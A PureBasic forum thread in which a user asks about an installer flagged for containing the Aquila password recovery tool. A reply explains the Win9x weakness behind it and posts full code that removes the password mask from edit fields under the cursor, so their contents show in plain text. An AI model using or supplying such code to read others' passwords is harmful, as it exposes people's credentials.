API-Guide v3.7x containing a password stealer???

Everything else that doesn't fall into one of the other PB categories.
wings
User
User
Posts: 21
Joined: Fri Apr 25, 2003 5:09 pm
Location: Canada

API-Guide v3.7x containing a password stealer???

Post by wings »

I downloaded the API-Guide from this web site: http://www.mentalis.org/agnet/apiguide.shtml

Every time when I try to run the setup for the API-Guide, I get a message from PestPatrol saying that this exe contains Aquila 1.3

PestPatrol says this about the "pest":

"Aquila is a multifunctional, easy-to-use password recovery tool. The following passwords can be recovered using Aquila: - Cached Windows passwords - Dial-up connections passwords - Passwords in codeword fields (****) - ICQ passwords, Versions 99b to 2000b."

Sounds scary or not?

Anyone know more about this?

(I already contacted the people behind this product but they didn't reply yet)
Num3
PureBasic Expert
PureBasic Expert
Posts: 2812
Joined: Fri Apr 25, 2003 4:51 pm
Location: Portugal, Lisbon
Contact:

Post by Num3 »

Aquila does not work under NT, Win2k or XP, has it works on an exploit of win9x. The password string was easly acessable though API calls, but that was corrected for NT based OS.

Someone wrote a snippet in purebasic that does the same thing!

Here it is :lol:

Code: Select all

; German forum: http://robsite.de/php/pureboard/viewtopic.php?t=906&highlight=
; 6. May 2003
; Author: Volker

; Klartext 
; 
; ändert die EM_SETPASSWORDCHAR-Eigenschaft eines Textfeldes via API, 
; so dass das Auslesen des Passwortes im Klartext möglich wird. 
; Nach dem Start den Cursor über ein Passwort-Textfeld bewegen. 
; 
; 06.05.2003 Volker 

#SWP_NOMOVE = $2 
#SWP_NOSIZE = $1 
#HWND_TOPMOST = -1 
#HWND_NOTOPMOST = -2 

#EM_SETPASSWORDCHAR = $CC 

#Text1 = 1 
#Label2 = 2 

Global hwnd.l 

Structure POINTAPI 
X.l 
Y.l 
EndStructure 


;/////////////////////////////////////////////////////////// 
Procedure getWindowUM() 
;/////////////////////////////////////////////////////////// 
Dim P.POINTAPI(1) 
lo.l 
str.s 

;Cursorposition auslesen 
GetCursorPos_(P(0)) 

;Das entsprechende Fenster finden 
lo = WindowFromPoint_(P(0)\X, P(0)\Y) 

;Den Titel auslesen 
str = Str(GetWindowTextLength_(lo)) 
GetWindowText_ (lo, str, 100) 

;Ergebnis anzeigen 
SetGadgetText (#Text1, str) 

;Den Passwortcharacter entfernen 
SendMessage_ (lo, #EM_SETPASSWORDCHAR, 0, "") 

Delay (10) 

EndProcedure 


;/////////////////////////////////////////////////////////// 
Procedure Open_Window() 
;/////////////////////////////////////////////////////////// 
hwnd = OpenWindow(#Label2, 352, 182, 270, 98, #PB_Window_MinimizeGadget |#PB_Window_SystemMenu | #PB_Window_SizeGadget | #PB_Window_TitleBar , "Klartext") 
If CreateGadgetList(WindowID()) 
StringGadget(#Text1, 10, 10, 250, 30, "") 
EndIf 
EndProcedure 



;-Main //////////////////////////////////////////////////////////////////////////////// 

Open_Window() 

;Formular immer oben halten 
SetWindowPos_ (hwnd, #HWND_TOPMOST, 0, 0, 0, 0, #SWP_NOMOVE | #SWP_NOSIZE) 

Repeat 
Event = WaitWindowEvent() 
getWindowUM() 
Delay (10) 
Until Event = #PB_EventCloseWindow 
End
; ExecutableFormat=Windows
; EOF
wings
User
User
Posts: 21
Joined: Fri Apr 25, 2003 5:09 pm
Location: Canada

Post by wings »

Thanks num3! :)
Post Reply